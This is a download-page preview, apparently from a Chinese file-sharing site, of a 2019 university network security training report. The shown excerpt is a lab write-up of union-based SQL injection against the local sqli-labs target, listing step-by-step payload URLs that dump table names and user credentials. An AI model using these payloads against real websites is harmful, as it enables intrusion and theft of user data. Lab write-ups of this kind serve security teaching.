没有合适的资源?快使用搜索试试~ 我知道了~
1、 漏洞危害 2、 漏洞原理 3、 漏洞利用条件 4、 漏洞利用步骤记录 5、 详细步骤
资源详情
资源评论
资源推荐
2019 暑期网络空间安全专业网络安全实训
目 录
一、 实训概述 ........................................................................................................................... 4
二、 实训学习记录 ................................................................................................................... 4
2.1 环境部署 ....................................................................................................................... 4
2.1.1 移动安全基础环境 ........................................................................................... 4
2.1.2 协议安全基础环境 ........................................................................................... 5
2.1.3 Web 安全基础环境 ........................................................................................... 6
2.2 网络协议攻防实训记录 ............................................................................................... 7
2.2.1 IP 地址欺骗攻击 .............................................................................................. 8
2.2.2 ARP 欺骗攻击 ................................................................................................ 12
2.2.3 ICMP 欺骗 ...................................................................................................... 17
2.2.4 TCP RST 攻击 ................................................................................................ 20
2.2.5 TCP SYN 洪范攻击 ........................................................................................ 23
2.2.6 TCP 会话劫持 ................................................................................................ 26
2.2.7 DNS 欺骗攻击 ................................................................................................ 31
2.3 移动安全攻防实训记录 ............................................................................................. 37
2.3.1 安卓木马制作 ................................................................................................. 37
2.3.2 安卓木马绑定 ................................................................................................. 41
2.4 Web 安全攻防实训记录............................................................................................. 46
2.4.1 SQLi 漏洞 ....................................................................................................... 46
2.4.2 XSS 漏洞 ........................................................................................................ 55
2019 暑期网络空间安全专业网络安全实训
2.4.3 文件上传漏洞 ................................................................................................. 62
2.4.4 代码审计 ......................................................................................................... 71
2.4.5 信息搜集实战过程记录 ................................................................................. 88
2.4.6 使用 kali 进行综合渗透 ................................................................................. 88
2.5 爬虫编写实训 ........................................................................................................... 117
2.5.1 实训思路 ....................................................................................................... 117
2.5.2 实训步骤 ....................................................................................................... 119
2.5.3 实训总结 ....................................................................................................... 119
2.6 基线检查及系统加固 ............................................................................................... 120
2.6.1 Windows........................................................................................................ 120
2.6.2 Apache .......................................................................................................... 123
2.6.3 Ubuntu 16.04 ................................................................................................. 127
2.6.4 MySQL .......................................................................................................... 133
三、 实训心得体会 ............................................................................................................... 138
2019 暑期网络空间安全专业网络安全实训
第 45/ 136 页
或删除。
1、 漏洞危害
1) 会泄漏数据库中存储的用户隐私信息。
2) 通过操作数据库对某些网页进行篡改。
3) 修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。
4) 数据库服务器被恶意操作,系统管理员帐户被篡改。
5) 数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。
6) 破坏硬盘数据,导致全系统瘫痪。
2、 漏洞原理
SQL 注入攻击指的是通过构建特殊的输入作为参数传入 Web 应用程序,而这些输
入大都是 SQL 语法里的一些组合,通过执行 SQL 语句进而执行攻击者所要的操作,其
主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
SQL 注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据
库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法
的数据查询。
3、 漏洞利用条件
1) 攻击者可以控制输入的数据
2) 服务器要执行的代码拼接了控制的数据
4、 漏洞利用步骤记录
1) 找到注入点,判断是字符型还是数字型;
2) 字符型注入:通过回显判断闭合方式:‘,) and #。找到元素个数和位置;
3) 通过 information-schema 确定数据库结构;
4) 得到数据
2019 暑期网络空间安全专业网络安全实训
第 46/ 136 页
5、 详细步骤
1) Less-1: 先访问靶场第一关,访问 id=2-1 出错,判断查询语句为字符型。猜测闭
合符类型:先输入单引号,根据返回报错信息知道闭合符就为单引号
通过 orderby 判断表的列数,输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' order
by 5--+,报错发现没有五列,于是减少列数,当减到 3 时发现不再报错,确定表有
三列。
通过 union 查询确定显示位:输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1'
union select1,2,3--+发现表的显示位有两位。
2019 暑期网络空间安全专业网络安全实训
第 47/ 136 页
用 database() 爆库名:输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' union
select1,database(),3--+,数据库名称为 security。
利用 group_concat 爆表名:输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' union
select1,2,group_concat(table_name) from information_schema.tables where
table_schema=database() --+,有四张表 emails,referers,uagents,users,猜测用户
名表为 users
利用’users’ 表爆列名: 输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' union
select1,2,group_concat(column_name) from information_schema.columns where
table_name=’users’ --+,爆出列名有 id,username,password,Id,name,sex,age,description
对用户名和密码进行爆破:http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' union
select1,2,group_concat(username,”:”,password ) from users--+,得到所有的用户名和
密码
剩余71页未读,继续阅读
马虫医生
- 粉丝: 24
- 资源: 324
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- MySQL开发案列优质学习资料资源工具与案列应用场景开发文档教程资料.txt
- MATLAB仿真案列优质学习资料资源工具与案列应用场景开发文档教程资料.txt
- MATLAB优质学习资料资源工具与案列应用场景开发文档教程资料.txt
- 4319447015972566022ssm城市交通海量数据管理系统.zip
- 前端开发实例优质学习资料资源工具与案列应用场景开发文档教程资料.txt
- Screenshot_20240601_132217.jpg
- Screenshot_20240601_132233.jpg
- Screenshot_20240601_132255.jpg
- Screenshot_20240601_132403.jpg
- Swift语言优质学习资料资源工具与案列应用场景开发文档教程资料.txt
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0